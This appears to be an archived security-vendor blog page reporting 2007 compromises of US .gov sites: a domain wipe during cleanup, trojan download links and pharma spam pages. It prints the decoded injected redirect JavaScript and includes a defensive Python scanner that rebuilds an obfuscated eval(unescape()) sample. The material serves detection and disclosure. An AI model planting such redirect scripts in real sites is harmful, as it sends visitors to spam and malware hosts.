
Archive for October 5th, 2007


Oct 5

We’ve told you this before and we’re saying it again. Nobody’s safe.

A hacker compromised a California county Web site to redirect visitors to a porn site. The LA Times and Network World report that the cleanup did not go well: a staff member at the U.S. General Services Administration in Washington, which oversees the .gov domain, accidentally wiped out the entire ca.gov domain in response. That was not the intention, of course, but the effects grew as the day wore on. State employees were unable to reach certain Web sites and, worse, to exchange email messages. Downtime was less than half a day, but the incident prompted a discussion between the California and Washington IT teams about communication plans for changes of this size.

Note that the ca.gov domain itself was not compromised; it was the corrective action that took everything down. Still, this should wake the authorities up to the need to clean up the code hosted on .gov domains, which are especially prone to abuse by malware authors looking to plant malicious content. This is despite the prevailing idea that educational and government institutions, which publish non-financial information on their Web sites, are poor targets for malware authors. Although there may seem to be little reason to test these sites for possible exploitation when no money is directly at stake, malware authors see them as easy targets. Trend Micro researchers proved as much months ago when they found at least two government Web sites abused by a search-engine-optimization (SEO) spammer; the sites carried pages urging visitors to buy certain pharmaceutical products.

And for us in the security industry, to quote Trend Micro Network Architect Paul Ferguson, “We’ve been banging the right drum, for the right reason, for a long time now.” There truly is no end to the dangers and annoyances, collateral or otherwise, that these hackers can bring.

Posted in Security

Oct 5
by Macky Cruz (Technical Communications)

Sadly, the spate continues. Chalk another one up for this Arizona .gov site, laced with links leading to malware downloads. Trend Micro analysts found that the page http://{BLOCKED}.azgu.gov/pupt.asp?Parkid=223 carries the following links:

* http:// {BLOCKED}n.shopmedic. info/
* http:// {BLOCKED}s.shopmedic. info/
* http:// {BLOCKED}b.shopmedic. info/

All of these malicious links lead to the following page:

When the Continue button is clicked, the browser loads http://{BLOCKED}oft. com/download/502/541/1/, which in turn downloads http://{BLOCKED}oft.com /soft/ temp/502_16c222a_ 1/VideoAccessCodecInstall.exe:

Good thing Trend Micro already detects this as TROJ_ZLOB.DZW. The variants of the ZLOB family, known for posing as video codecs, are notorious downloaders.

Porn and Viagra redirects (the usual fare in recent hacks) are one thing, but malware downloads reek of a more sinister intent.

Nobody has learned, apparently, judging by the attacks of the past few days: one ca.gov county site and one superior court site. Hacked legitimate Web sites pose the greatest danger to Internet users today, since attacks like these conveniently dispose of the hard-and-fast browsing dictum to never visit untrusted sites. Now it doesn’t matter where you surf; what matters are the tools you have to protect your browsing experience.

Authorities have been duly notified for site mitigation.

Thanks also to Trend Micro Researcher Erbert Ancheta and Michael Cortes for the additional info.

Posted in Security

Oct 5
by Ivan Macalintal (Advanced Threats Researcher)

Something’s hot in California and it’s not Angelina. Barely two days after a CA .gov site was confirmed hacked, Trend Micro received reports that another California county .gov Web site is deep in porn trouble. The jury section of the Tulare superior court Web site http://www. tularesuperiorcourt.ca.gov/jury/ has been compromised and is serving pages such as:

* http://www. tularesuperiorcourt.ca.gov/jury/propecia.html
* http://www. tularesuperiorcourt.ca.gov/jury/meridia.html
* http://www. tularesuperiorcourt.ca.gov/jury/valium.html
* http://www. tularesuperiorcourt.ca.gov/jury/xanax.html
* http://www. tularesuperiorcourt.ca.gov/jury/adipex.html
* http://www. tularesuperiorcourt.ca.gov/jury/levitra.html
* http://www. tularesuperiorcourt.ca.gov/jury/cialis.html

Below is a screenshot of one of the said compromised pages:



The obfuscated script tag inserted into the hacked pages decodes to the following JavaScript:

window.location=("http://{BLOCKED}yurls.com/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=&se=&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword={CBOSKEYWORD}");

In other words, the browser is sent to http://{BLOCKED}yurls.com/in.cgi?, carrying the referring page (seoref) and the compromised page’s own URL (HTTP_REFERER) as parameters, so the redirector knows where each visitor came from. As of this writing, that page redirects to another site and displays the following:



Trend Micro has duly notified the proper authorities and is working with US-CERT to mitigate this attack.

Further analysis provided by Trend Engineer Benson Sy.
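The two compromises above share a pattern a site owner can check for mechanically: injected links or pages pushing pharmaceutical names, and an inline script that has been encoded so the redirect is not visible in the raw HTML. The script below is an added example, not Trend Micro’s code or anything the researchers describe using. It decodes one layer of JavaScript unescape("%xx...") wrapping and then looks for location= assignments and pharma links. The sample pages are constructed; the {BLOCKED} hostnames are this page’s own placeholders, and the unescape() wrapping of the injected script is an assumption, since the post does not say how the tag was encoded.

```python
"""
Scanner for the two kinds of injected content described on this page:
pharma/SEO spam links and an obfuscated <script> that redirects visitors.

Added example, not Trend Micro's code. The sample pages below are
constructed; the {BLOCKED} hostnames are the page's own placeholders, and
the unescape("%xx...") wrapping of the injected script is an assumption.
"""
import html
import json
import re
from urllib.parse import unquote

# Drug names that appeared in the injected page names / link text on this page.
PHARMA_TERMS = ("viagra", "cialis", "levitra", "propecia",
                "meridia", "valium", "xanax", "adipex")

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
UNESCAPE_RE = re.compile(r"unescape\(\s*([\"'])(.*?)\1\s*\)", re.S)
LINK_RE = re.compile(r"<a\b[^>]*\bhref\s*=\s*[\"']([^\"']+)[\"'][^>]*>(.*?)</a>", re.I | re.S)
LOCATION_RE = re.compile(
    r"(?:window\.|document\.|top\.|self\.)?\blocation(?:\.href)?\s*=\s*\(?\s*[\"']([^\"']+)[\"']")
HOST_RE = re.compile(r"^https?://([^/?#]+)", re.I)


def decode_scripts(page):
    """Inline script bodies, plus one layer of unescape("...") decoding."""
    out = []
    for body in SCRIPT_RE.findall(page):
        out.append(body)
        for _quote, payload in UNESCAPE_RE.findall(body):
            out.append(unquote(payload))  # JS unescape("%77...") is URL-decoding
    return out


def host_of(url):
    m = HOST_RE.match(url.strip())
    return m.group(1) if m else None


def redirect_hosts(page):
    """Hosts that any (decoded) script sends the browser to via location=..."""
    hosts = set()
    for js in decode_scripts(page):
        for url in LOCATION_RE.findall(js):
            h = host_of(url)
            if h:
                hosts.add(h)
    return hosts


def offsite_link_hosts(page, site_host):
    """Hosts of <a href> links that point away from the site's own hostname."""
    hosts = set()
    for href, _text in LINK_RE.findall(page):
        h = host_of(html.unescape(href))
        if h and h.lower() != site_host.lower():
            hosts.add(h)
    return hosts


def pharma_links(page):
    """Links whose URL or anchor text mentions one of the drug names."""
    hits = set()
    for href, text in LINK_RE.findall(page):
        blob = (href + " " + text).lower()
        if any(term in blob for term in PHARMA_TERMS):
            hits.add(href)
    return hits


def scan(page, site_host):
    findings = {
        "redirect_hosts": sorted(redirect_hosts(page)),
        "offsite_link_hosts": sorted(offsite_link_hosts(page, site_host)),
        "pharma_links": sorted(pharma_links(page)),
    }
    # Off-site links alone are normal; a script redirect or pharma links are not.
    findings["suspicious"] = bool(findings["redirect_hosts"] or findings["pharma_links"])
    return findings


# --- constructed samples (assumed encoding, placeholder hostnames) ---------
DECODED_REDIRECT = (
    'window.location=("http://{BLOCKED}yurls.com/in.cgi?2&seoref="'
    '+encodeURIComponent(document.referrer)'
    '+"&parameter=&se=&ur=1&HTTP_REFERER="'
    '+encodeURIComponent(document.URL)+"&default_keyword={CBOSKEYWORD}");'
)


def percent_escape(text):
    """Encode text the way a JS unescape() payload would be written."""
    return "".join("%%%02X" % ord(c) for c in text)


SITE_HOST = "www.tularesuperiorcourt.ca.gov"

COMPROMISED_HTML = f"""<html><body>
<h1>Jury Information</h1>
<script>eval(unescape("{percent_escape(DECODED_REDIRECT)}"))</script>
<p>Buy <a href="http://{{BLOCKED}}n.shopmedic.info/">cheap cialis</a> online</p>
<a href="/jury/propecia.html">propecia</a>
<a href="/jury/summons.html">Jury summons</a>
<a href="http://{SITE_HOST}/jury/">Jury home</a>
</body></html>"""

CLEAN_HTML = """<html><body>
<h1>Jury Information</h1>
<script>document.getElementById("d").innerHTML = "Jury duty dates";</script>
<a href="/jury/summons.html">Jury summons</a>
<a href="http://www.courts.ca.gov/">California Courts</a>
</body></html>"""

if __name__ == "__main__":
    print(json.dumps(scan(COMPROMISED_HTML, SITE_HOST), indent=2))
    print(json.dumps(scan(CLEAN_HTML, SITE_HOST), indent=2))
```

Run it directly to print a report for both samples, or call scan() on fetched HTML together with the site’s own hostname. It decodes only a single unescape() layer, which is all the sample needs; real injections often nest several encodings, so a production check would loop until the decoded output stops changing.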

Posted in Security
